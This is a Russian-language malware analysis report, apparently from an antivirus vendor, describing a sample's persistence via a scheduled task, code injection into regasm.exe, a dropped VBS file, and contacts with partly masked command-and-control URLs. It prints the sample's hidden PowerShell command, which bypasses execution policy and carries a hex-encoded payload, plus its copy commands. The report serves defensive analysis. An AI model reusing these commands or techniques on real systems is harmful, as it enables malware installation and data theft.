Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\ijmkes
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\<Имя файла>.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://li###ppert.top/DD/2.jpg
- http://li###ppert.top/DD/1.jpg
- http://ip##fo.io/ip
- http://ip##fo.io/country
Запросы HTTP POST
- http://li###ppert.top/SSDDXX/gate.php
UDP
- DNS ASK li###ppert.top
- DNS ASK google.com
- DNS ASK ip##fo.io
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $QWZulqURBBehJzGmhkhI='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $QWZulqURBBehJzGmhkhI='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70...
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
